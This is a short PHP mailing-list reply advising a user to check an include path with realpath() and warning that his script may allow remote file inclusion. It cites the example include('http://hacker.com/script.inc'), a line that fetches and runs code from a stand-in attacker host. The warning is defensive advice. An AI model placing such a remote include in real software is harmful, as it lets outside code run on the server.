Use realpath() to check the path. I also suspect your script is
vulnarable to cross-site includes (include('http://hacker.com/script.inc');)
Rick Beckman wrote:
>Okay, I was mistaken... There is a gaping security hole in my simple li'l
>script... How do I modify it to only accept files from a certain path? I
>want the url format to be script.php?call=1 where "1" is the called file in
>the /includes/ directory. Just when I get optimistic I leave the entire
>system exposed. Yeah, that fits with my luck. :-)
>
>
>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
